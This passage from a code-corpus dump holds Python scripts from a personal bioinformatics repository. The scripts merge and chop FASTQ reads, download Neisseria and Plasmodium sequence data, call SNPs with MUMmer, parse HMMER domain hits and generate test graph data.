"text": "'''\nCreated on Feb 16, 2018\n\n@author: javi\n'''\nimport subprocess\nimport os\nimport re\n\nif __name__ == '__main__':\n \n flash_path = \"/home/javi/ProgramFiles/FLASH-1.2.11/flash\"\n directory = \"/data/new/javi/neis/ngo4/N20\" #change as needed\n format = \"^(.+)[_]R[12].fastq\"\n outpath = directory + \"/merged\"\n \n if not os.path.isdir(outpath): os.mkdir(outpath)\n \n names = set([re.match(format, x).groups(1)[0] for x in os.listdir(directory) if re.match(format, x)])\n \n print(names)\n \n os.chdir(directory)\n \n for name in names:\n with open(\"./merged/\" + name + \".fastq\", 'w') as f:\n args = [flash_path, name + \"_R1.fastq\", name + \"_R2.fastq\", \"-c\"]\n subprocess.call(args, stdout = f)\n \n print(\"done.\")\n "
},
{
"alpha_fraction": 0.5440582036972046,
"alphanum_fraction": 0.5529506802558899,
"avg_line_length": 22.711538314819336,
"blob_id": "8e101a7dab39fa229448484842e859c329a83aae",
"content_id": "cfe086a2586631fdd34eedffe3b4f25031d56aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 52,
"path": "/misc/PubMLSTDownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nDownloads some genomes from ncbi using a .csv table file\n\n@author: javi\n'''\nimport re \nfrom subprocess import call\nfrom os import chdir\n\ndef parseCSV(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n entries = []\n \n for line in re.split('\\n', data):\n if line == '': \n continue\n \n entries.append([re.sub(r'^\"|\"$', '', s) for s in re.split(',', line)]) #strips quotes\n \n legend = entries.pop(0)\n \n return legend, entries\n\n\ndef download(info):\n #downloads files gives a parsed table of info\n base_url = 'https://pubmlst.org/bigsdb?db=pubmlst_neisseria_isolates&page=downloadSeqbin&isolate_id='\n id_index = 0\n name_index = 1\n\n \n for entry in info:\n if '/' in entry[name_index]:\n url = base_url + str(entry[id_index])\n name = re.split('/', entry[name_index])[0]\n call(['wget', '-O', '{}.fasta'.format(name), url])\n print(name)\n\nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis'\n table = 'ids.csv'\n out = 'seqs'\n \n chdir('/'.join([directory, out]))\n info = parseCSV('/'.join([directory, table]))\n download(info[1])\n "
},
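The quote stripping in parseCSV() above behaves like this on an invented row; note it would mishandle quoted commas, where the csv module would be the robust choice:

```python
import re

line = '"1234","strainA/contig1","2017"'
fields = [re.sub(r'^"|"$', '', s) for s in re.split(',', line)]
print(fields)  # ['1234', 'strainA/contig1', '2017']
```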
{
"alpha_fraction": 0.5830671191215515,
"alphanum_fraction": 0.5963791012763977,
"avg_line_length": 26.101449966430664,
"blob_id": "2157d345944ea14b88a7f3c057be93b84c997b98",
"content_id": "d3106aa0a35ffea9accd5806680fa994865fb5f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1878,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 69,
"path": "/misc/ngo_fasta.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 24, 2018\n\nmakes snps files using nucmer\n\n@author: Javi\n'''\nimport os\nimport re\nfrom multiprocessing import Pool\nimport subprocess as sp\n\ndef nucmer(file, ref, outpath):\n \n name = findName(file)\n \n if name+'.snps' in os.listdir(outpath):\n print(name+\" is already done!\")\n return\n \n nuc_command = ['nucmer', '--prefix='+name, ref, file]\n filter_command = ['delta-filter', '-r', '-q', name+'.delta', '>', name+'.filter']\n snps_command = ['show-snps', '-Clr', name+'.filter', '>', outpath+'/'+name+'.snps']\n \n print(name+': starting nucmer')\n nuc_result = sp.run(nuc_command, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(nuc_result.stdout)\n \n print(name+': starting filter')\n filter_result = sp.run(' '.join(filter_command), shell = True, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(filter_result.stdout)\n \n print(name+': starting show-snps')\n snps_result = sp.run(' '.join(snps_command), shell = True, stderr=sp.STDOUT, stdout=sp.PIPE, encoding='UTF-8')\n print(snps_result.stdout)\n\n#use if you need to alter the name for formatting. specific to each data set.\ndef findName(raw):\n\n pattern = '^PRO1650_(.+?)_'\n pattern2 = '(.+?).fasta'\n try:\n name = re.match(pattern, raw).group(1)\n except:\n name = re.match(pattern2, raw).group(1)\n \n return name\n \n\nif __name__ == '__main__':\n \n directory = '/data/new/javi/neis/ngo4/N20/merged/fasta'\n outpath = 'snps'\n logpath = 'log.txt'\n ref = 'FA1090.fasta' \n files = [x for x in os.listdir(directory) if x.endswith('fasta')]\n print(files)\n os.chdir(directory)\n \n try:\n os.mkdir(outpath)\n except:\n pass\n \n \n \n \n with Pool(processes=4) as pool:\n pool.starmap(nucmer, [(x, ref, outpath) for x in files])\n "
},
{
"alpha_fraction": 0.4166666567325592,
"alphanum_fraction": 0.5,
"avg_line_length": 8.5,
"blob_id": "ed9ede5451aaaa04169484651cdfc83c8cc33583",
"content_id": "1e3805407ff6710bc543fb1e3b517b315d936a1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 6,
"path": "/Proteins/FilterHammodia.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 19, 2014\n\n@author: javi\n'''\nimport re \n\n\n "
},
{
"alpha_fraction": 0.5293489694595337,
"alphanum_fraction": 0.5448238849639893,
"avg_line_length": 29.278688430786133,
"blob_id": "a0315240ceba9151972cb3f6639708b86e0f220e",
"content_id": "f0927066059aec7073ef906549dcb5962577bbf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1874,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 61,
"path": "/Proteins/HMMParser.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\n'''Container script for HMM parsing routines'''\nimport re\nimport numpy\n\n'''filepath -> dictionary of nested dictionary\nreads a hmm search file and get the protein domain scores.\n\nreturn structure\n\n{proteinID : {domainID: (family, score)}}\n'''\ndef read(filepath, family):\n results = {}\n pattern = re.compile('>> (.+?)\\n\\n(?=>>|\\n)', re.DOTALL)\n \n with open(filepath) as f:\n fStr = f.read()\n matches = re.findall(pattern, fStr)\n for block in matches:\n pid, domainScores = parseBlock(block, family)\n if len(domainScores) > 0:\n results[pid] = domainScores\n \n print(str(len(matches)) + \" proteins from \" + filepath + \" from \" + family + \" read.\")\n return results\n \n'''string -> nested dict\ngiven a block representing one protein, parse info into {name: {domainnum : (family, score, length, cys, degenerate)}}'''\ndef parseBlock(block, family):\n results = {}\n name = re.match(\"(.+)\\s\", block).group(1)\n \n \n domains = re.search(\"(?s)^.*?----\\n (.+)(?=\\n\\n Alignments)\", block).group(1).split(\"\\n \")\n domSeqs = re.split(\"==\", block)[1:]\n \n count = 1\n for domain, domSeq in zip(domains, domSeqs):\n fields = re.split(\"[\\s]+\", domain)\n score = float(fields[5])\n coords = (int(fields[9]), int(fields[10]))\n sequence = \"\".join(re.findall(\"{0}\\s+\\d+\\s+(.*?)\\s.*?\".format(re.split(\" \", name)[0]), domSeq))\n cys = sequence.upper().count(\"C\")\n \n if score > 0.00001 or coords[1] - coords[0] < 90:\n continue\n \n if cys < 4:\n degenerate = True\n else:\n degenerate = False\n \n results[count] = (family, score, coords, cys, degenerate)\n count += 1\n \n return name, results\n \n \n \n "
},
{
"alpha_fraction": 0.6323684453964233,
"alphanum_fraction": 0.6365789771080017,
"avg_line_length": 37.292930603027344,
"blob_id": "2bceb9c5fbff5fb613e8c56ef5a816aef51ed69b",
"content_id": "2f03b949d26d41e3ddac5ac705d7280f6bafbe7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3800,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 99,
"path": "/Proteins/ProteinRunner.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\nimport Proteins.HMMParser as hmp\nimport Proteins.DomainFamily as dmf\nimport Proteins.SequenceSelect as ss\nimport Proteins.SRSCytoscape as srsce\nimport Proteins.Chartmaker as cm\nimport os\nimport re\n\n\nif __name__ == '__main__':\n# #Job: merging multiple hmm families. This script specifically deals with the file/folder structure.\n# directory = \"/data/javi/Proteins/results\"\n# resultPath = \"/data/javi/Proteins/HMMResolved\"\n# try:\n# os.mkdir(resultPath)\n# except:\n# pass\n# \n# print(\"reading data\")\n# data = {}\n# for dir in os.walk(directory).next()[1]:\n# family = dir\n# path = \"/\".join([directory, dir])\n# files = [ x for x in os.listdir(path) if os.path.isfile(\"/\".join([path,x]))]\n# for file in files:\n# strain = re.split(\"\\.\",file)[0]\n# if strain not in data:\n# data[strain] = []\n# data[strain].append(hmp.read(\"/\".join([path, file]), family))\n# \n# print(\"analyzing\")\n# results = {}\n# for strain, info in data.items():\n# print(\"resolving strain: \" + strain)\n# results[strain] = dmf.choose(info)\n# dmf.printTree(results[strain], \"{0}/{1}.hmmr\".format(resultPath, strain))\n# \n# \n# print(\"HMM reorganiation completed.\")\n# \n# # Job: selecting all the found sequences from fasta file.\n# hmmrDirectory = \"/data/javi/Proteins/HMMResolved\"\n# fastaDirectory = \"/data/javi/Proteins\"\n# outputDirectory = \"/data/javi/Proteins/SelectedFastas\"\n# \n# hmmrFiles = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory, x]))]\n# for hmmr in hmmrFiles:\n# print(\"selecting proteins for {0}\".format(hmmr))\n# strain = re.match(\"^(.+?).hmmr\", hmmr).group(1)\n# hmmrpath = \"/\".join([hmmrDirectory, hmmr])\n# fastapath = \"/\".join([fastaDirectory, strain + \".aa.fsa\"])\n# outpath = \"/\".join([outputDirectory, strain + \".hits.fasta\"])\n# ss.select(hmmrpath, fastapath, outpath, strain)\n# print(\"selection completed\")\n\n\n# #Job: filtering out hammodia\n# filepath=\"/data/javi/Proteins/orthoMCL/final.txt\"\n# outpath=\"/data/javi/Proteins/orthoMCL/noHam.txt\"\n# ss.filter(filepath, outpath)\n# print(\"done filtering\")\n\n# #Job: changing the names.\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/orthoMCL/named.csv\"\n# hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n# ss.toName(filepath, hmmrDirectory, outpath)\n\n# #Job: cytoscape encoding\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/SRSCytoscape.xgmml\"\n# hmmDirectory=\"/data/javi/Proteins/HMMResolved\"\n# clusters = srsce.loadClusters(filepath)\n# cytotext = srsce.encode(clusters, hmmDirectory, 'SRS Proteins')\n# with open(outpath, 'w') as output:\n# output.write(cytotext)\n# print(\"cytoscape file completed.\")\n\n# #job: Make distrubution chart\n# filepath=\"/data/javi/Proteins/orthoMCL/groups.txt\"\n# outpath=\"/data/javi/Proteins/chart.csv\"\n# hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n# clusters = srsce.loadClusters(filepath)\n# domains = srsce.getNodeDomains(hmmrDirectory)\n# translated = cm.translateMatrix(clusters, domains)\n# data = cm.distributionChart(translated[0], translated[1])\n# cm.printDistributionChart(data[0], data[1], outpath)\n \n #job: Make domainsstats chart\n outpath=\"/data/javi/Proteins/domainStat.csv\"\n hmmrDirectory=\"/data/javi/Proteins/HMMResolved\"\n composition = srsce.getNodeDomains(hmmrDirectory)\n data = cm.domainStats(composition)\n cm.printDomainStats(data, outpath)\n \n "
},
{
"alpha_fraction": 0.5834625363349915,
"alphanum_fraction": 0.5870801210403442,
"avg_line_length": 27.761194229125977,
"blob_id": "d36048f4c1458faec8baacbb1aa5ff63b6262978",
"content_id": "2f6d110c8033e23665bcb034eea013ceb0d529e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 67,
"path": "/ConsensusChopper/FqBlock.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 17, 2013\n\n@author: javi\n'''\n#Temporarily holds a fastq block prior to writing into the file.\n#Starts out blank\n#Sequence and qscores are kept separately, and are both extensible. You can't really delete though.\n\nimport re\n\nclass FqBlock:\n '''\n classdocs\n '''\n\n\n def __init__(self, blocklength, overlap):\n self.sequence = \"\"\n self.qscore = \"\"\n self.seqid = \"\"\n self.blocklength = blocklength\n self.overlap = overlap\n \n def build(self):\n #This is the main part of the class. Takes the original block and \n #outputs the block divided into X basepair blocks with Y overlap on either side. \n \n tempseqlist = []\n tempqscorelist = []\n \n while(len(self.sequence) > self.blocklength):\n tempseqlist.append(self.sequence[:self.blocklength])\n self.sequence = self.sequence[self.blocklength-self.overlap:]\n tempqscorelist.append(self.qscore[:self.blocklength])\n self.qscore = self.qscore[self.blocklength-self.overlap:]\n \n tempseqlist.append(self.sequence)\n tempqscorelist.append(self.qscore)\n \n output = \"\"\n for x in range (0, len(tempseqlist)):\n output = output + \"%s %d\\n%s\\n+\\n%s\\n\" % (self.seqid, x, tempseqlist[x], tempqscorelist[x])\n \n# print output\n return output\n \n def write(self, output):\n output.write(self.build())\n \n def setSequence(self, newsequence):\n self.sequence = newsequence \n \n def setQscore(self, newqscore):\n self.qscore = newqscore\n \n def addRaw(self, newraw):\n self.raw = self.raw + newraw\n \n def setSeqid(self, newseqid):\n self.seqid = newseqid\n \n def __print(self):\n print(self.build())\n \n def reset(self):\n self.__init__(self.blocklength, self.overlap)\n "
},
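A usage sketch for FqBlock above; the import path and the 16 bp read are assumptions for illustration:

```python
from ConsensusChopper.FqBlock import FqBlock  # assumes the repo root is on sys.path

b = FqBlock(10, 3)                 # 10 bp windows, 3 bp overlap
b.setSeqid("@test")
b.setSequence("ACGTACGTACGTACGT")  # 16 bp
b.setQscore("IIIIIIIIIIIIIIII")
print(b.build())  # "@test 0" with the first 10 bp, then "@test 1" with the 9 bp tail
```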
{
"alpha_fraction": 0.5308164954185486,
"alphanum_fraction": 0.5421878695487976,
"avg_line_length": 32.02325439453125,
"blob_id": "e67f46d836efd1f83ae67243e0d39c0e7f2003c0",
"content_id": "80765a22b27f2eea0d32c5460a7f02d48aaaea46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4397,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 129,
"path": "/misc/MummerTable.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on May 8, 2018\r\n\r\n@author: Javi\r\n'''\r\nimport re\r\nimport os\r\nimport ChrTranslator as ct\r\nimport ChrNameSorter as cns\r\nimport sys\r\n\r\ndef addData(f, sampleName, dataTree, reference, organism):\r\n \r\n totalCount = 0\r\n disregardCount = 0\r\n type = 'snps'\r\n\r\n try:\r\n data = f.read()\r\n noHeader = re.search(fetchRegexPattern(f.name), data).group(1)\r\n except Exception as e:\r\n print(\"header parsing error in %s: %s\" % (f.name, str(e)))\r\n sys.exit()\r\n \r\n #Divide the remaining data into lines\r\n rawLines = re.split(\"\\n\", noHeader)\r\n parsed = []\r\n #Parsing lines\r\n for line in rawLines[:-1]:\r\n totalCount += 1\r\n temp = organizeLine(line, sampleName, type, organism)\r\n \r\n #modified for euks!\r\n if temp is not None and re.search('CHR', temp[0]):\r\n parsed.append(temp)\r\n elif temp is None:\r\n disregardCount += 1\r\n \r\n#Add the parsed data to the dataTree \r\n for dataPoint in parsed:\r\n \r\n #Ensures that the branch this data line refers exists.\r\n #If not, create it \r\n currentLevel = dataTree\r\n for branchName in dataPoint[:2]:\r\n if branchName not in currentLevel:\r\n currentLevel[branchName] = {}\r\n currentLevel = currentLevel[branchName]\r\n #Adds the SNP value to the tree\r\n currentLevel[dataPoint[-3]] = dataPoint[-2]\r\n if reference not in currentLevel:\r\n currentLevel[reference] = dataPoint[-1]\r\n \r\n print(\"{0!s} disregarded out of {1!s} total\".format(disregardCount, totalCount))\r\n \r\n return dataTree\r\n\r\ndef fetchRegexPattern(name):\r\n print(\"fetching RegEx for %s\" % name)\r\n if name.endswith(\".snps\"):\r\n return \"(?s)^.*?=\\n(.*)\"\r\n else:\r\n return \"(?sm)^([^#].*)\"\r\n \r\n \r\ndef organizeLine(rawLine, name, type, organism):\r\n \r\n lineSplit = re.split(\"\\s+\",rawLine)\r\n try:\r\n if type is 'snps':\r\n chr = ct.translate(lineSplit[14].upper(), mode=organism)#for plasmo aligned from 3D7\r\n ref = lineSplit[2].upper()\r\n snp = lineSplit[3].upper()\r\n indel = len(ref) > 1 or len(snp) > 1 or re.search('[^AGCT]', ref) or re.search('[^AGCT]', snp)\r\n pos = int(lineSplit[1])\r\n if not indel:\r\n return [chr, pos, name, snp, ref]\r\n else:\r\n return None\r\n else:\r\n chr = ct.translate(lineSplit[0].upper(), mode=organism).upper()\r\n indel = len(lineSplit[3]) > 1 or len(lineSplit[4]) > 1 or re.search('[^AGCT]', lineSplit[3]) or re.search('[^AGCT]', lineSplit[4])\r\n hetero = re.search(\"1/1\", lineSplit[9])\r\n quality = float(lineSplit[5])\r\n pos = int(lineSplit[1])\r\n snp = lineSplit[4].upper()\r\n ref = lineSplit[3].upper()\r\n #choice of 5 as a quality min is a bit arbitrary\r\n if hetero and not indel and quality > 0:\r\n return [chr, pos, name, snp, ref] \r\n else:\r\n return None\r\n except Exception as e:\r\n print(\"Illegal Line in file %s: %s\" % (name, e))\r\n print(lineSplit)\r\n\r\ndef output(f, dataTree, sampleList, organism, reference):\r\n \r\n sampleList = sorted(sampleList)\r\n \r\n with open(f, 'w') as output:\r\n header = '\\t'.join(['#CHROM', 'POS'] + sampleList) + '\\n'\r\n output.write(header)\r\n \r\n for chr in sorted(dataTree.keys(), key=lambda x: cns.getValue(x, organism)):\r\n for pos in dataTree[chr]:\r\n d = dataTree[chr][pos]\r\n line = '\\t'.join([chr, str(pos)] + [d[x] if x in d else d[reference] for x in sampleList]) + '\\n'\r\n output.write(line)\r\n\r\nif __name__ == '__main__':\r\n path = 'D:/Documents/data/neis/snps5'\r\n outpath = 'D:/Documents/data/neis/neis5.tsv'\r\n organism = 'strep'\r\n reference = 'FA1090'\r\n sampleList = 
[]\r\n \r\n dataTree = {}\r\n os.chdir(path)\r\n \r\n files = [x for x in os.listdir(path) if x.endswith('.snps')]\r\n for f in files:\r\n name = f[:-5]\r\n sampleList.append(name)\r\n with open(f, 'r') as input:\r\n dataTree = addData(input, name, dataTree, reference, organism)\r\n \r\n output(outpath, dataTree, sampleList, organism, reference)\r\n print('Mummer Table Completed')\r\n "
},
{
"alpha_fraction": 0.6183844208717346,
"alphanum_fraction": 0.623756468296051,
"avg_line_length": 28.922618865966797,
"blob_id": "546db7a68ecd5c0d4e5dc64566768886f4d4e391",
"content_id": "a0f69690b18abf801aa331dafa3bab3f51836b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5026,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 168,
"path": "/misc/ENADownloader.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan. 2, 2019\n\n@author: Javi\n'''\nimport requests\nimport sys\nimport xml.etree.ElementTree as xml\nimport multiprocessing as mp\nimport subprocess as sub\nimport os.path\nimport os\nimport pandas\nimport numpy as np\nimport logging\nimport re\nfrom datetime import datetime as dt\n\n\ndef getAcc(sec_acc):\n '''\n returns the run accession from the secondary accession. if there are multiple we return the last one. Probably the best one?\n '''\n \n print('getting acc for ' + sec_acc)\n template = \"https://www.ebi.ac.uk/ena/data/view/{0}&display=xml\"\n \n res = requests.get(template.format(sec_acc)).content\n \n root = xml.fromstring(res)\n \n try:\n for child in root.find('SAMPLE').find('SAMPLE_LINKS'):\n if child.find('XREF_LINK').find('DB').text == 'ENA-RUN':\n return child.find('XREF_LINK').find('ID').text.strip().split(',')[-1] #we're going to return only the last accession. Hopefully this works. \n except AttributeError:\n return None\n\n \ndef downloadSample(downloader_path, output_path, acc):\n '''\n process one sample. we're going to assume it's just one acc.\n it's actually impractical to do more than 1.\n '''\n \n print('downloading ' + str(acc))\n \n def getPath(acc, n):\n '''gets the full path for an accession, for cat purposes.\n n means the first or second file'''\n \n return os.path.join(output_path, acc, acc, \"{0}_{1}.fastq.gz\".format(acc, str(n)))\n \n def getFinalPath(acc, n):\n '''\n so it turns out we had to have the downloader go one level deeper.\n then we want to move the file back up\n '''\n return os.path.join(output_path, acc, \"{0}_{1}.fastq.gz\".format(acc, str(n)))\n\n sub.run([downloader_path, '-f', 'fastq', '-d', os.path.join(output_path, acc), acc])\n \n os.rename(getPath(acc, 1), getFinalPath(acc, 1))\n os.rename(getPath(acc, 2), getFinalPath(acc, 2))\n os.rmdir(os.path.join(output_path, acc, acc))\n \n logging.info(acc) #TODO\n\ndef downloadSampleStar(params):\n return downloadSample(*params)\n\ndef checkForCompletion(log, acc):\n '''\n checks if this acc is in the log. Return true if not there.\n '''\n if re.search(acc, log):\n print(acc + ' already done!')\n return False\n return True\n\ndef loadTable(input_path):\n '''\n this function will return a table with the column accs from the original 'accession' column\n the accs is always an ndarray. 
\n '''\n \n def accHelper(sec_accs):\n arr = [getAcc(sec_acc.strip()) for sec_acc in sec_accs.split(',')]\n return np.array(arr)\n \n df = pandas.read_csv(input_path, sep='\\t')\n df['accs'] = df['accession'].apply(accHelper)\n \n #filter out rows where we have no run accs\n df = df.loc[df['accs'].notnull()]\n return df\n\ndef configLogger(path):\n \n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n \n fh = logging.FileHandler(path)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: \\n %(message)s \\n')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n\n\ndef run(downloader_path, input_path, output_path):\n \n log_path = os.path.join(output_path, 'log.txt')\n acc_path = os.path.join(output_path, 'accs.pkl')\n \n configLogger(log_path)\n \n if not os.path.isfile(acc_path):\n #if this is not a restart, read tsv and make it a hdf\n acc_df = loadTable(input_path) \n acc_df.to_pickle(acc_path)\n else:\n acc_df = pandas.read_pickle(acc_path)\n \n # print(acc_df)\n #get accs of the ones we need to run, then flatten\n accs = acc_df['accs']\n accs = pandas.Series([item for sublist in list(accs) for item in sublist if item != None])\n \n #from here on accs should be a flat series\n if os.path.isfile(log_path):\n with open(log_path, 'r') as f:\n log = f.read()\n \n msk = accs.apply(lambda x: checkForCompletion(log, x))\n accs = accs.iloc[list(msk)]\n \n pool = mp.Pool() \n pool.map(downloadSampleStar, [(downloader_path, output_path, x) for x in accs])\n \n \n \n \nif __name__ == '__main__':\n \n# downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n# input_path = '/d/data/plasmo/additional_data/test_accs.txt'\n# output_path = '/d/data/plasmo/additional_data'\n\n downloader_path = '/d/data/plasmo/enaBrowserTools/python3/enaDataGet'\n input_path = '/d/data/plasmo/new_accs.txt'\n output_path = '/home/javi/seq'\n\n\n # downloader_path = '/home/j/jparkin/xescape/programs/enaBrowserTools/python3/enaDataGet'\n # input_path = sys.argv[1]\n # output_path = sys.argv[2]\n \n run(downloader_path, input_path, output_path)\n print('ENADownloader Complete.')\n \n\n#TESTING ONLY \n# print(getAcc('ERS010446'))"
},
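The restart logic in ENADownloader.py keys off plain substring hits in the log text; a sketch with invented accessions:

```python
from ENADownloader import checkForCompletion  # assumes misc/ is on sys.path

log = "2019-01-02 ...\nERR123456\n"
print(checkForCompletion(log, 'ERR123456'))  # False -- already in the log
print(checkForCompletion(log, 'ERR000001'))  # True  -- still to download
```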
{
"alpha_fraction": 0.5662558078765869,
"alphanum_fraction": 0.570878267288208,
"avg_line_length": 33.18421173095703,
"blob_id": "caba34626ea3e04202b56b1f0304be79d57f370c",
"content_id": "d6861a81c878a3265da24075173a09ad1351d469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 38,
"path": "/ConsensusChopper/Duplicator.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Oct 9, 2013\n\n@author: javi\n'''\nimport os\n\nif __name__ == '__main__':\n #modify these as needed\n directory = input(\"Please specify working directory, in full \\n\")\n identifier = input(\"Please input sequence identifier, not including the @ symbol \\n\")\n length = eval(input(\"Please specify the length of moving window \\n\"))\n overlap = eval(input(\"Please specify the length of overlap \\n\"))\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Chopped\")):\n os.mkdir(\"Chopped\")\n \n chopdirectory = directory + \"/Chopped\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\\n%s\\n%s\\n%s\\n\" % (directory, identifier, length, overlap))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n namesplit = f.split(\".\")\n if namesplit[len(namesplit)-1] == \"fq\":\n chop(directory, chopdirectory, f, identifier, length, overlap, log)\n else:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n except:\n log.write(\"\\nerror, %s is not a fq file\" % f)"
},
{
"alpha_fraction": 0.5479755997657776,
"alphanum_fraction": 0.5646145343780518,
"avg_line_length": 26.015625,
"blob_id": "b160f232be06a6e2841b6694657e46015ebe427e",
"content_id": "600563363368f25f35c449bf34adbb170a946fed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 64,
"path": "/misc/drift_check.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nscript that checks how much drift there actually is, slowwwly. \r\nusage: drift_check.py [path_to_input] [path_to_output]\r\noutputs a tsv in the format of:\r\n\r\n1 A:10 B:5...\r\n2 A:10 B:3...\r\n\r\n'''\r\ndef parse(path):\r\n\r\n def splitLine(line):\r\n return line.rstrip('\\t').split('\\t')\r\n with open(path, 'r') as input: \r\n data = input.read() \r\n \r\n lines = data.rstrip('\\n').split('\\n')\r\n rows = [splitLine(line) for line in lines]\r\n return rows\r\n\r\ndef count(row):\r\n #given one row, return the test statistics. \r\n\r\n pos = row[1]\r\n bases = row[2:]\r\n\r\n unique_bases = set(bases)\r\n counts = [bases.count(base) for base in unique_bases]\r\n\r\n return (pos, sorted(zip(unique_bases, counts), key=lambda x: x[1], reverse=True))\r\n\r\ndef countSummary(count_results):\r\n #make a summary. how many are drift.\r\n drift_count = 0\r\n\r\n for row in count_results:\r\n pos, counts = row\r\n l = len(counts)\r\n if l <= 1:\r\n drift_count += 1\r\n elif l >= 3:\r\n pass\r\n elif counts[1][1] <= 1:\r\n drift_count += 1\r\n \r\n return '{0} drift position out of {1}, for a total of {2} percent\\n'.format(str(drift_count), str(len(count_results)), str(drift_count / len(count_results) * 100)[:6])\r\n\r\n\r\n\r\ndef makeOutput(row_data):\r\n pos, counts = row_data\r\n return '\\t'.join([str(pos)] + ['{0}:{1}'.format(str(base), str(count)) for base, count in counts])\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n path = sys.argv[1]\r\n out_path = sys.argv[2]\r\n\r\n rows = parse(path)\r\n count_results = [count(row) for row in rows]\r\n\r\n with open(out_path, 'w') as output:\r\n output.write(countSummary(count_results))\r\n output.write('\\n'.join([makeOutput(row) for row in count_results]))\r\n\r\n \r\n\r\n"
},
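A sketch of count() from drift_check.py above on an invented row (chromosome, position, then one base per sample):

```python
from drift_check import count  # assumes misc/ is on sys.path

row = ['chr1', '42', 'A', 'A', 'G']
print(count(row))  # ('42', [('A', 2), ('G', 1)])
```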
{
"alpha_fraction": 0.4716723561286926,
"alphanum_fraction": 0.4996587038040161,
"avg_line_length": 24.275861740112305,
"blob_id": "6859d60584ee918295d922398534c32fd2659392",
"content_id": "3ab3149dc15d2e41b8fe78efe8a35ab554c74439",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1465,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 58,
"path": "/misc/JsonWriter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 11, 2017\n\n@author: javi\n'''\n\ndef genData(n):\n import string\n import random\n \n result = {}\n \n nodes = []\n edges = []\n \n colorTable = {}\n color = ['#7fc97f','#beaed4','#fdc086','#ffff99','#386cb0']\n groups = ['A', 'B', 'C']\n ns = 100\n \n names = sorted([''.join(random.sample(string.ascii_letters, 3)) for x in range(n)])\n \n for i, name in enumerate(names):\n node = {}\n node['name'] = name\n node['group'] = groups[i%3]\n node['id'] = str(i)\n node['ids'] = [random.choice(names) for x in range(ns)]\n node['lengths'] = [random.choice([1,2,4,10,15,20]) for x in range(ns)]\n nodes.append(node)\n colorTable[name] = color[i%3]\n \n n = 0 \n for i, source in enumerate(names):\n for j, target in enumerate(names):\n if j > i:\n edge = {}\n edge['source'] = source\n edge['target'] = target\n edge['width'] = str(random.random() * 20)\n n += 1\n edges.append(edge)\n \n \n return {'names': names, 'nodes': nodes, 'edges': edges, 'colorTable': 